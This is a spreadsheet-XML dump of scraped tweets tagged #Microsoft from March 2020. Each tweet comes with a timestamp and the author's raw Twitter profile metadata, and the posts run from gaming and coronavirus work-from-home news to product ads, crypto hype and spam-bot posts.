    <t>{'id': 1235370837882085376, 'id_str': '1235370837882085376', 'name': 'Elizabeth Crawford', 'screen_name': 'riddzalackre', 'location': 'Peoria, USA', 'description': 'You are my best friend, my human diary and my other half. You mean the world to me and I LOVE YOU.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Thu Mar 05 01:05:41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'http://pbs.twimg.com/profile_images/1235373653937795072/gBHg1tOk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235373653937795072/gBHg1tOk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235370837882085376/1583371046',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</si>
  <si>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04:44:02 +0000 2020</t>
  </si>
  <si>
    <t>#Archlabs 2020.03.02-beta is out, but it really needs to #deletegithub
Who would trust #gnu #linux distros that make their announcements in a #proprietarysoftware #microsoft site?</t>
  </si>
  <si>
    <t>Thu Mar 05 04:39:01 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations @nikoangelo3 !! The compliment us absolutely deserved! #halo #HaloSpotlight #xbox #gaming #cosplay #costume #cosplayer #haloreach #microsoft #343industries #343i #C2E22020 #C2E2 #405th #405thinfantry @405th https://t.co/lR5KTJpEpq</t>
  </si>
  <si>
    <t>{'id': 1234904557789990913, 'id_str': '1234904557789990913', 'name': '405th Midwest Regiment', 'screen_name': '405thMidwest', 'location': '', 'description': 'Oversees Illinois, Indiana, Iowa, Kansas, Michigan, Minnesota, Missouri, Nebraska, North Dakota, Ohio, South Dakota, and Wisconsin.', 'url': 'https://t.co/6AXQnaQzRe', 'entities': {'url': {'urls': [{'url': 'https://t.co/6AXQnaQzRe', 'expanded_url': 'http://www.405th.com', 'display_url': '405th.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 66, 'listed_count': 0, 'created_at': 'Tue Mar 03 18:13:09 +0000 2020', 'favourites_count': 5,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'http://pbs.twimg.com/profile_images/1235098692417355777/7aCSMH_P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235098692417355777/7aCSMH_P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234904557789990913/1583284221',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</si>
  <si>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04:36:51 +0000 2020</t>
  </si>
  <si>
    <t>Halo reach is one of my favorite campaigns of all time!
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy #gamer... https://t.co/xr32dRNfid</t>
  </si>
  <si>
    <t>Thu Mar 05 04:35:22 +0000 2020</t>
  </si>
  <si>
    <t>Some key benefits of Microsoft #Dynamics365 #BusinessCentral: 
Check here:https://t.co/dCpeTuU3dz
#MSDyn365 #MSDynNAV #Microsoft #MSDyn365BC #BusinessCentral #MSPartners #Cloud #Azure #Dyn365 #CRM #Technology #Software #Technology #Microsoftdynamics @BaffleSol https://t.co/dRe0iQKOS5</t>
  </si>
  <si>
    <t>{'id': 717929949772931072, 'id_str': '717929949772931072', 'name': 'BaffleSol', 'screen_name': 'BaffleSol', 'location': 'Gurgaon, India', 'description': 'Software Company: One of the best implementors of Microsoft Dynamics 365; supporting &amp; upgrading old school/redundant practices to create digital transformation', 'url': 'https://t.co/GGKAWSdpds', 'entities': {'url': {'urls': [{'url': 'https://t.co/GGKAWSdpds', 'expanded_url': 'http://www.bafflesol.com', 'display_url': 'bafflesol.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 214, 'listed_count': 35, 'created_at': 'Thu Apr 07 04:20:13 +0000 2016', 'favourites_count': 1056, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 706, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/768771595158552576/5leksyWo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/768771595158552576/5leksyWo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/717929949772931072/1460031378',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</si>
  <si>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04:35:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge: Keyboard shortcuts for #Windows10 and macOS https://t.co/LQoe5zbx2m via @techrepublic</t>
  </si>
  <si>
    <t>{'id': 2832060986, 'id_str': '2832060986', 'name': 'Tech Help KB ðŸ“š', 'screen_name': 'techhelpkb', 'location': 'San Francisco, CA, USA', 'description': 'https://t.co/CK42CgoBCR - Technical help knowledgebase, tech news, how-to articles &amp; video tutorials for common issues. #TechSupport #Browser #Bitcoin #Privacy', 'url': 'https://t.co/XxTO97OGv6', 'entities': {'url': {'urls': [{'url': 'https://t.co/XxTO97OGv6', 'expanded_url': 'https://techhelpkb.com', 'display_url': 'techhelpkb.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/CK42CgoBCR', 'expanded_url': 'https://TechHelpKB.com', 'display_url': 'TechHelpKB.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 8912, 'friends_count': 9710, 'listed_count': 320, 'created_at': 'Thu Sep 25 16:47:24 +0000 2014', 'favourites_count': 1291, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24156,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'http://pbs.twimg.com/profile_images/585657423509266432/41Qud0Xx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/585657423509266432/41Qud0Xx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2832060986/1487007298', 'profile_link_color': 'F7A700',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</si>
  <si>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Mar 05 04:34:00 +0000 2020</t>
  </si>
  <si>
    <t>MONSTER HUNTER: WORLD - ICEBORNE MASTER EDITION [DELUXE]
Capcom - Xbox One
#Monsterhunter #capcom #xboxone #microsoft #playasia #affiliate #sale #weeklyspecial 
List price: US$ 91.99
Special price: US$ 19.99*
You save: US$ 72.00 (78%)
https://t.co/91oqoLvCyJ https://t.co/yQhRB8OBmz</t>
  </si>
  <si>
    <t>Thu Mar 05 04:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Kids are now home from school for two weeks and I am working from home for three weeks #coronavirus #microsoft</t>
  </si>
  <si>
    <t>{'id': 283579898, 'id_str': '283579898', 'name': 'Dale Hirt ðŸ‡µðŸ‡· (he/him)', 'screen_name': 'dalehirt', 'location': 'Redmond, WA', 'description': 'Father of 5. Data professional. #scoutsbsa #sqlfamily\nhttps://t.co/w19VXxrV4I', 'url': 'https://t.co/D4QMFftwEN', 'entities': {'url': {'urls': [{'url': 'https://t.co/D4QMFftwEN', 'expanded_url': 'http://about.me/dalehirt', 'display_url': 'about.me/dalehirt', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/w19VXxrV4I', 'expanded_url': 'http://www.nohello.com', 'display_url': 'nohello.com', 'indices': [54, 77]}]}}, 'protected': False, 'followers_count': 826, 'friends_count': 420, 'listed_count': 52, 'created_at': 'Sun Apr 17 15:37:51 +0000 2011', 'favourites_count': 43691, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9043,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'http://pbs.twimg.com/profile_images/1207183406355738624/GonxwU4c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207183406355738624/GonxwU4c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/283579898/1581311729',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</si>
  <si>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04:28:56 +0000 2020</t>
  </si>
  <si>
    <t>We are extremely happy to announce that we have achieved #Microsoft Azure Expert Managed Services Provider status by providing exceptional service to our customers on their #cloud journey: https://t.co/mszZUSO5V0 https://t.co/7JwLcXy7ca</t>
  </si>
  <si>
    <t>Thu Mar 05 04:28:14 +0000 2020</t>
  </si>
  <si>
    <t>Please Retweet!
Major market shift coming!
Scarcity will push #bitcoin $btc prices higher!
$LINK #AMD #MICROSOFT partnership!
Is #Binance manipulating $LINK?
Life changing money made faster!
https://t.co/CkYyCsYfLG</t>
  </si>
  <si>
    <t>{'id': 973920489998602242, 'id_str': '973920489998602242', 'name': 'CryptoBitcoinChris', 'screen_name': 'CryptoBTC_Chris', 'location': '', 'description': '', 'url': 'https://t.co/oitCLYUFaf', 'entities': {'url': {'urls': [{'url': 'https://t.co/oitCLYUFaf', 'expanded_url': 'https://www.youtube.com/channel/UCiS4L2Gelx9BaOQ2UPXsDGg', 'display_url': 'youtube.com/channel/UCiS4Lâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8022, 'friends_count': 330, 'listed_count': 56, 'created_at': 'Wed Mar 14 13:55:14 +0000 2018', 'favourites_count': 11381, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7017, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1012787009100959744/L6I16OwJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1012787009100959744/L6I16OwJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/973920489998602242/1531933186',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</si>
  <si>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04:24:53 +0000 2020</t>
  </si>
  <si>
    <t>twitch #twitchstreamer #mixer #mixerstreaming #gaming #xbox #xboxone #playstation #playstation4 #asus #razer #corsair #elgato #gamecapture #steelseries #acer #hp #dell #alienware #logitech #youtube #youtuber #turtlebeach #hyperx #lg #sony #microsoft #custom https://t.co/8Se5A3hXGg</t>
  </si>
  <si>
    <t>{'id': 503403938, 'id_str': '503403938', 'name': 'Logan', 'screen_name': 'ImSaucinIt', 'location': 'United States', 'description': 'Whoâ€™s ready to get sauced ðŸ‘¾ Small twitch streamer ðŸŽ® Come join the sauce crew! ðŸ”´TWITCH AFFILIATEðŸ”´', 'url': 'https://t.co/9yX4ZhHwRz', 'entities': {'url': {'urls': [{'url': 'https://t.co/9yX4ZhHwRz', 'expanded_url': 'http://twitch.tv/imsaucinit', 'display_url': 'twitch.tv/imsaucinit', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 169, 'friends_count': 171, 'listed_count': 0, 'created_at': 'Sat Feb 25 18:57:25 +0000 2012', 'favourites_count': 2710, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5603,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'http://pbs.twimg.com/profile_images/1235698139136483328/cRVTpXpb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235698139136483328/cRVTpXpb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/503403938/1583448370',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</si>
  <si>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04:23:00 +0000 2020</t>
  </si>
  <si>
    <t>Top 5 Electronic Companies in the World
Call us at 9708094321 or
visit:https://t.co/N6oSG6nacD
#samsung #apple #tsmc #medtronic #intel #microsoft  #stockmarketindia  #stockmarketnews #intradaytrading  #indiansharemarket #markettime #stockmarkettime  #stockmarket #india https://t.co/kj9ZClzC2B</t>
  </si>
  <si>
    <t>{'id': 191751052, 'id_str': '191751052', 'name': 'The Mukul Agrawal', 'screen_name': 'themukulagrawal', 'location': 'india', 'description': 'Technical Analyst | Technical Analysis Workshop &amp; Webinar | ISO Registered | TEDx &amp; Rotary Club Speaker | Technical Analysis Society Singapore Member 9708094321', 'url': 'https://t.co/3pr00GYbCG', 'entities': {'url': {'urls': [{'url': 'https://t.co/3pr00GYbCG', 'expanded_url': 'http://www.agrawalcorporate.com', 'display_url': 'agrawalcorporate.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10179, 'friends_count': 94, 'listed_count': 46, 'created_at': 'Fri Sep 17 07:29:10 +0000 2010', 'favourites_count': 3945, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13132,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'http://pbs.twimg.com/profile_images/1019168516795191298/b1xnM1L7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019168516795191298/b1xnM1L7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/191751052/1583390008',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</si>
  <si>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04:22:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Google Offer Free #RemoteWork Tools Due to #Coronavirus - BleepingComputer https://t.co/eMMtc2X4S4 via @GoogleNews</t>
  </si>
  <si>
    <t>{'id': 100848769, 'id_str': '100848769', 'name': 'Paul Philleo', 'screen_name': 'philpauleo', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 653, 'friends_count': 647, 'listed_count': 250, 'created_at': 'Thu Dec 31 21:37:01 +0000 2009', 'favourites_count': 2726, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7259,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'http://pbs.twimg.com/profile_images/1283145173/mypic_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1283145173/mypic_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/100848769/1430089248',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</si>
  <si>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04:21:40 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Apple, #Microsoft, #Google look to move China production https://t.co/pYCp5Q893A</t>
  </si>
  <si>
    <t>{'id': 1224295033794433025, 'id_str': '1224295033794433025', 'name': 'Average Joe', 'screen_name': 'averagejoe_2020', 'location': '', 'description': 'Sharing Hong Kong News For People in Washington DC. \n\nplease DM any articles or suggestions.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 13, 'listed_count': 0, 'created_at': 'Mon Feb 03 11:34:28 +0000 2020', 'favourites_count': 341, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 117, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224296105598386179/IQttMBBG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224296105598386179/IQttMBBG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224295033794433025/1581054449',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</si>
  <si>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04:20:49 +0000 2020</t>
  </si>
  <si>
    <t>JUST IN:
According to figures published by @SynergyResearch, Amazon Web Services (#AWS), which recorded $9.95bn 
#cloud revenues in its last quarter Q4 2019, maintains 33% of overall market, ahead of #Microsoft (18%), #Google (8%), &amp;amp; #IBM (6%)
#CloudComputing #marketresearch https://t.co/RG1shpYS9D</t>
  </si>
  <si>
    <t>{'id': 3096568842, 'id_str': '3096568842', 'name': 'Veritis Group Inc', 'screen_name': 'Veritis_Group', 'location': 'Texas, USA', 'description': 'https://t.co/uZeAzvkhPo - IT consulting and solutions provider. Offers #Cloud, #Containerization, #DevOps, #DX, IT Infrastructure and Tech Advisory Services.', 'url': 'https://t.co/PetNum0Ps5', 'entities': {'url': {'urls': [{'url': 'https://t.co/PetNum0Ps5', 'expanded_url': 'https://www.veritis.com/', 'display_url': 'veritis.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/uZeAzvkhPo', 'expanded_url': 'https://www.Veritis.com', 'display_url': 'Veritis.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 909, 'friends_count': 3150, 'listed_count': 8, 'created_at': 'Wed Mar 18 17:59:35 +0000 2015', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 915,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'http://pbs.twimg.com/profile_images/1235138762314641408/BykGpnNm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235138762314641408/BykGpnNm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3096568842/1518164110',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</si>
  <si>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04:17:11 +0000 2020</t>
  </si>
  <si>
    <t>#Breaking: #Microsoft allows employees to work from home amid #coronavirus outbreak https://t.co/7TApGhFwLa https://t.co/yoD1JycvYn</t>
  </si>
  <si>
    <t>{'id': 2908313571, 'id_str': '2908313571', 'name': 'News247WorldPress', 'screen_name': 'News247WorldPre', 'location': 'London, England', 'description': 'NEWS AGENCY', 'url': 'https://t.co/bdbx8xccJu', 'entities': {'url': {'urls': [{'url': 'https://t.co/bdbx8xccJu', 'expanded_url': 'http://www.news247worldpress.com', 'display_url': 'news247worldpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 669, 'friends_count': 207, 'listed_count': 28, 'created_at': 'Sat Dec 06 21:28:47 +0000 2014', 'favourites_count': 45, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 126325,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1204109453144076289/VZuzFkpR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204109453144076289/VZuzFkpR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2908313571/1575809373', 'profile_link_color': 'E81C4F',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</si>
  <si>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04:13:39 +0000 2020</t>
  </si>
  <si>
    <t>I agree that passion burns me every time you are with me  
 #eeuu #microsoft https://t.co/gpkSSeyEx1</t>
  </si>
  <si>
    <t>{'id': 1235274771992137730, 'id_str': '1235274771992137730', 'name': 'Patricia Scott', 'screen_name': 'mayplatanchar', 'location': 'Everett, USA', 'description': 'You donâ€™t love someone because theyâ€™re perfect, you love them in spite of the fact that theyâ€™re not.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Wed Mar 04 18:43:56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'http://pbs.twimg.com/profile_images/1235275415490646017/20qLKAPf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235275415490646017/20qLKAPf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235274771992137730/1583347652',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</si>
  <si>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04:10:14 +0000 2020</t>
  </si>
  <si>
    <t>Tweak it (Customizing the UI) | Partly Cloudy  https://t.co/1ZlJygG3mu  #Azure #Microsoft #azureflashnews</t>
  </si>
  <si>
    <t>Thu Mar 05 04:01:07 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "YouTube Web Site Subscriptions are Broken, Videos Not Displayed [Fixed]:" https://t.co/Vh3iwMYchy
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Mar 05 04:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Meat Inspectors, chose PA as their services partner to deliver their File &amp;amp; Mailbox migration to Microsoft Office 365 OneDrive, SharePoint &amp;amp; Exchange Online services. Learn more about these services visit https://t.co/wEBW0510Gn
#clientsuccess #office365 #sharepoint #microsoft https://t.co/COwur5zobP</t>
  </si>
  <si>
    <t>{'id': 38065754, 'id_str': '38065754', 'name': 'Professional Advantage', 'screen_name': 'ProfessionalAdv', 'location': 'Australia', 'description': 'Helping organisations achieve more with IT solutions: BPM; financial management &amp; ERP; CRM; intranets &amp; portals; BI; infrastructure.', 'url': 'http://t.co/1DktkpAZbx', 'entities': {'url': {'urls': [{'url': 'http://t.co/1DktkpAZbx', 'expanded_url': 'http://www.pa.com.au', 'display_url': 'pa.com.au', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 613, 'friends_count': 101, 'listed_count': 76, 'created_at': 'Wed May 06 00:31:58 +0000 2009', 'favourites_count': 904, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2911, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '111111', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/940468205532807168/PiiUzNg6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/940468205532807168/PiiUzNg6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38065754/1550183716', 'profile_link_color': '990000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 03:58:56 +0000 2020</t>
  </si>
  <si>
    <t>Olala, this dick was sent to me in DM. He is very painful 
 #chinese #microsoft https://t.co/iJgR83hC6s</t>
  </si>
  <si>
    <t>{'id': 1235374396409368582, 'id_str': '1235374396409368582', 'name': 'Rachel Greer', 'screen_name': 'fonccawabci', 'location': 'Fort Lauderdale, USA', 'description': 'Then I realize what it is. Itâ€™s him. Something about him makes me feel like I am about to fall. Or turn to liquid. Or burst into flames', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Thu Mar 05 01:19:58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'http://pbs.twimg.com/profile_images/1235375158480834560/cbCO47e2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235375158480834560/cbCO47e2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235374396409368582/1583371476',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</si>
  <si>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03:56:49 +0000 2020</t>
  </si>
  <si>
    <t>Download Microsoft Sharepoint 2016 Free https://t.co/pCjOQw8PTA via @YouTube #Microsoft #Sharepoint #Download #Free #SystemAdmin #SystemAdministrator #SystemAdministration #Tech #Technology #IT</t>
  </si>
  <si>
    <t>Thu Mar 05 03:56:47 +0000 2020</t>
  </si>
  <si>
    <t>Get urself a lady that borrows her Xbox to you when youre breaks :) #pog #cod #callofduty #xbox #microsoft https://t.co/T1iPc4vOku</t>
  </si>
  <si>
    <t>{'id': 1212993431049396224, 'id_str': '1212993431049396224', 'name': 'WACOâš”ï¸', 'screen_name': 'WacoginTV', 'location': 'Windex bottle luaghin assssss', 'description': 'ðŸ”´WATCH ME LIVE NIGHTIMESâ€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”https://t.co/g5Ak6wNEdWâ€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”BEST IN THE NATION AT SNIPING â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€” CALL ME WACO $3500', 'url': 'https://t.co/UlhuLJFya5', 'entities': {'url': {'urls': [{'url': 'https://t.co/UlhuLJFya5', 'expanded_url': 'http://ww.twitch.tv/wacogin', 'display_url': 'ww.twitch.tv/wacogin', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/g5Ak6wNEdW', 'expanded_url': 'http://WWW.TWITCH.TV/WACOGIN', 'display_url': 'TWITCH.TV/WACOGIN', 'indices': [43, 66]}]}}, 'protected': False, 'followers_count': 134, 'friends_count': 111, 'listed_count': 1, 'created_at': 'Fri Jan 03 07:05:52 +0000 2020', 'favourites_count': 5535, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 319, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1216912092118294528/Ib3Vm8rH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216912092118294528/Ib3Vm8rH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1212993431049396224/1578859218',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</si>
  <si>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03:56:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft (@Microsoft) has allowed employees in #Seattle and #SanFrancisco to work from home till March 25 as the #novelcoronavirus outbreak continues to spread in the #US. 
#WuhanCoronavirus #CoronavirusOutbreak #Coronavirus
#COVID19 https://t.co/7rBYl6aTpU</t>
  </si>
  <si>
    <t>Thu Mar 05 03:54:56 +0000 2020</t>
  </si>
  <si>
    <t>World's #FIRST article - Understanding #Velocity in #Agile Approaches #Microsoft Project
Usage of velocity is relatively unknown with MS Project.
Also, many ask why the term "Velocity", why not "Speed"? This article explains.
https://t.co/O1U1ihytAn https://t.co/xpIJuYkdsu</t>
  </si>
  <si>
    <t>{'id': 1052315132, 'id_str': '1052315132', 'name': 'Satya Dash', 'screen_name': 'ManagementYogi', 'location': '', 'description': 'https://t.co/z8IUMDnhPX', 'url': 'https://t.co/OTbmBAtJsq', 'entities': {'url': {'urls': [{'url': 'https://t.co/OTbmBAtJsq', 'expanded_url': 'https://managementyogi.com/', 'display_url': 'managementyogi.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/z8IUMDnhPX', 'expanded_url': 'http://managementyogi.com/p/about.html', 'display_url': 'managementyogi.com/p/about.html', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 122, 'friends_count': 2, 'listed_count': 20, 'created_at': 'Tue Jan 01 10:30:07 +0000 2013', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 522, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/461874505015513089/9qcP1tg7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/461874505015513089/9qcP1tg7_normal.jpeg',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</si>
  <si>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03:51:20 +0000 2020</t>
  </si>
  <si>
    <t>"You, as a user, would have to provide two or more pieces of evidence to ensure that its really you thats logging in - not just some random automated cyberattack." https://t.co/lZbbFZ6Sje #MultifactorAuthentication #ComputerSecurity #Microsoft https://t.co/06Q4z2SmpD</t>
  </si>
  <si>
    <t>{'id': 431943798, 'id_str': '431943798', 'name': 'ETech 7', 'screen_name': 'ETech7', 'location': '30 W 47th St #301, New York, NY 10036', 'description': 'The not-so-serious Twitter voice of ETech 7 NYC - Managed IT | IT Consulting | IT Support | Hardware Configuration https://t.co/WS273PSOY6', 'url': 'http://t.co/Br9ztSTY7D', 'entities': {'url': {'urls': [{'url': 'http://t.co/Br9ztSTY7D', 'expanded_url': 'http://www.etech7.com', 'display_url': 'etech7.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/WS273PSOY6', 'expanded_url': 'https://blog.etech7.com/', 'display_url': 'blog.etech7.com', 'indices': [115, 138]}]}}, 'protected': False, 'followers_count': 541, 'friends_count': 1629, 'listed_count': 41, 'created_at': 'Thu Dec 08 21:26:02 +0000 2011', 'favourites_count': 1158, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5715, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0099B9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1144677382730727425/j5Y23reD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1144677382730727425/j5Y23reD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/431943798/1561993859', 'profile_link_color': '91D2FA',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</si>
  <si>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03:49:13 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT enters a Downtrend as Momentum Indicator dropped below the 0 level on February 21, 2020. View odds for this and other indicators: https://t.co/RLrQoRZKPN #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/PrTiadKS9k</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</si>
  <si>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</si>
  <si>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03:49:12 +0000 2020</t>
  </si>
  <si>
    <t>#deletegithub
Don't send #python developers to #microsoft #proprietarysoftware with spying and #censorship https://t.co/ui5JVWwWm6</t>
  </si>
  <si>
    <t>Thu Mar 05 03:47:37 +0000 2020</t>
  </si>
  <si>
    <t>Crisis Communication: a Power Platform template #Microsoft #PowerApps #Cloud  https://t.co/eRHmfv28hs</t>
  </si>
  <si>
    <t>{'id': 862835977, 'id_str': '862835977', 'name': 'Luca Pellegrini', 'screen_name': 'LucoPelle', 'location': 'Cambridge,  UK', 'description': '#MSFTDyn365 Senior Program Manager for @Microsoft, travel addict, #IoT lover &amp; #cloud believer. Married with the wonderful @makira_s', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 509, 'friends_count': 1005, 'listed_count': 39, 'created_at': 'Fri Oct 05 10:23:33 +0000 2012', 'favourites_count': 6937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2442, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '129BB3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/599134196683116544/CfuFWF38_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/599134196683116544/CfuFWF38_normal.jpg', 